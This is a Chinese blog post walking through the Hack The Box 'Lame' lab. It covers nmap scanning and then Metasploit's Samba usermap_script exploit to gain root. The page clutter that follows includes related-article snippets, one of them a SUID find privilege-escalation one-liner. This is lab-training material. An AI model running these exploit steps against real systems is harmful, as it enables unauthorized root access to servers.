hack the box lame渗透过程

最新推荐文章于 2024-01-30 15:09:01 发布
最新推荐文章于 2024-01-30 15:09:01 发布
阅读量1.6k 收藏 5
点赞数 3
分类专栏: web安全 文章标签: 渗透 hack hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nini_boom/article/details/90137870
版权

hack the box就不多介绍了。直接上题

1、信息收集

lame
端口扫描
nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3

参数作用
-Pn如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作
-sV检查服务端的软件版本,可针对不同版本选择payload
-sC脚本扫描
-A-sC、-sV、-O(检查操作系统),Traceroute
-oN将扫描结果导入文件中

我们打开10.10.10.3.txt看看
在这里插入图片描述
ftp-anon:支持匿名登录。但是进去ftp看了一圈之后,并没有发现什么可用的信息。

2、漏洞利用

445端口 netbios-ssn Samba smbd 3.0.20-Debian
可见这个东西,正常情况下应该是要被关掉才安全的。既然我们知道了该服务开启,并有了版本号,msf启动。

msf搜索对用的payload

msfconsole
msf> search samba 3.0.20
查看列表,找到rank等级为excellent的payload
msf> use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit
随后等待3秒,
id可以看到,现在服务器已经是root权限了
在这里插入图片描述
找到root.txt,flag到手
在这里插入图片描述
game over.

3、经验总结

1、端口扫描知识掌握
2、msf使用以及cve漏洞尝试
3、netbios-ssn Samba这个可能是绝大多数人没有防备,关掉的服务,感觉是个有用的侵入点

不算太难,但是先学套路,多见识题目

nini_boom
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
The LAME GUI-开源
05-09
这是LAMELame Aint MP3编码器)的简单GUI。 它是为希望将文件快速转换为mp3而又无需麻烦的功能和选项的人们创建的。 目前,只有Linux版本可用,Windows即将推出。
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
最新发布
2201_75353421的博客
01-30 623
Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
Hack The Box::Lame
aya3t的博客
10-10 326
Hack The Box::Lame
HTB靶机-Lame-WP
灰蜗牛
04-25 851
简介:Tags:Rating: 4.4Skills:扫下IP: 1.ftp 匿名登录ftp查看一下 尝试vsftp对应的漏洞 该漏洞不存在,转向ssh和smb试着爆破一下,没发现可以利用的点。 不用MSF怎么解决呢?试试nmap的nse漏洞脚本,无果 非MSF 信息搜集,寻找历史漏洞确定Samba具体版本 关于smbclient出现NT_STATUS_CONNECTION_DISCONNECTED错误smbclient从4.11开始协议取消了nt1,使用smbv2,所以导致协议不能协商,解决办法如上,通过
Hack The Box靶场练习之Lame
qq_44767905的博客
01-31 415
HTB-----Lame
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1551
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机,靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
Hack The Box】linux练习-- Lame
人间体佐菲的博客
11-07 160
Hack The Box】linux练习-- Lame
Hack the box: Bastion
neal1991的专栏
10-10 1220
介绍目标:10.10.10.134 (Windows)Kali:10.10.16.65In conclusion, Bastion is not a medium box...
Metasploit2: tcp port 139/445 – Samba smbd
Nixawk
07-30 4914
Metasploit2: tcpport 139 – netbios-ssn Windows系统开启139端口,可用工具psshutdown.exe远程关闭电脑. Samba可运行在MicrosoftWindows外的系统,例如:UNIX, Linux, IBM System, OpenVMS和其他的系统.Samba使用的是TCP/IP协议.它允许主机与Windows客户端
hack the box lame靶机
zr1213159840的博客
04-13 559
首先打开靶机,给了提示,说是cve-2007-2447,搜索这个漏洞编号后,发现是一个samba漏洞,名字叫usermap_script 使用nmap扫描一下看看,能发现确实是存在samba的。 nmap -sV -Pn -A 10.10.10.3 打开msf,然后搜索usermap_script search usermap_script 然后使用第一个exploit use 0 查看一下需要设置哪些东西 options 将远程地址设置为10.10.10.3,远程的端口设置为445(才开
QT环境搭建步骤-直接解压
08-17
QT环境搭建步骤-直接解压 Qt的相关资料
libmp3lame.so.rar
03-02
Android编译好的libmp3lame.so支持arm64-v8a
libmp3lame.rar
03-20
libmp3lame.so 为arm64-v8a ,armeabi-v7a,x86,x86_64 的lame库 ,用于mp3转码,是安装转MP3库
libmp3lame.so
08-31
录音
lame3.99的64位版本
02-08
lame是转换Mp3的目前最好的工具, 这个版本是最新3.99版64位系统的,推荐!
红蓝演习对抗之溯源篇
nini_boom的博客
06-05 3218
分享工作之外有用的事情。 一、流量监测 流量中发现有IP持续在对公司资产进行攻击。 初步判断是有人使用扫描器在对公司资产进行攻击。 二、溯源信息 为了能找到更多攻击者的信息,首选是拿下攻击者的服务器。 我听取了大神的建议,使用goby进行初步的扫描,不用不知道,一用吓一跳。 这里吹一波goby,基于go内核,速度和效率有保证,UI优雅,采用 Electron+VUE 前端框架,跨平台,从扫描到打漏洞库,乃至生成报告,一条龙服务了。哈哈哈,废话少说,看结果。 不到5s,结果出来了,很明显,这里存在.
子域名劫持漏洞详解、挖掘和防护
nini_boom的博客
08-30 2417
总之,你挖掘漏洞的方法越奇特,详尽,你所能挖到的东西也就越多。 一、理解子域名劫持漏洞 这个分标题只为了回答一个问题:子域名劫持是怎么形成的、怎么理解它? 一个域名对应着一个提供服务的服务器IP,如何对应起来的?很简单,DNS解析,是DNS让域名和IP进行对应的。同样的,子域名对应着一个IP,或者是对应着另外一个域名。 对应这张图,主要解释下几个过程。 递归解析。一次性完成全部名字到地址的转换。比如baidu.com直接解析到8.8.8.8,不需要经过其他步骤来处理。 反复解析。每次请求一个服务器,请.
小记SUID -find提权
nini_boom的博客
11-01 2192
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; 如果有find执行 touch test find . -exec /bin/sh ; -quit 这时候,你就拥有...
eyed3使用过程中报Lame tag CRC check failed
05-31
这个问题通常是由于 MP3 文件中的 LAME 标签 CRC 校验失败导致的。这可能是由于 LAME 编码器版本的不同或者标签被其他工具修改而导致的。 你可以尝试使用 `--ignore-tag-errors` 参数忽略这些错误,例如: ``` $ ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值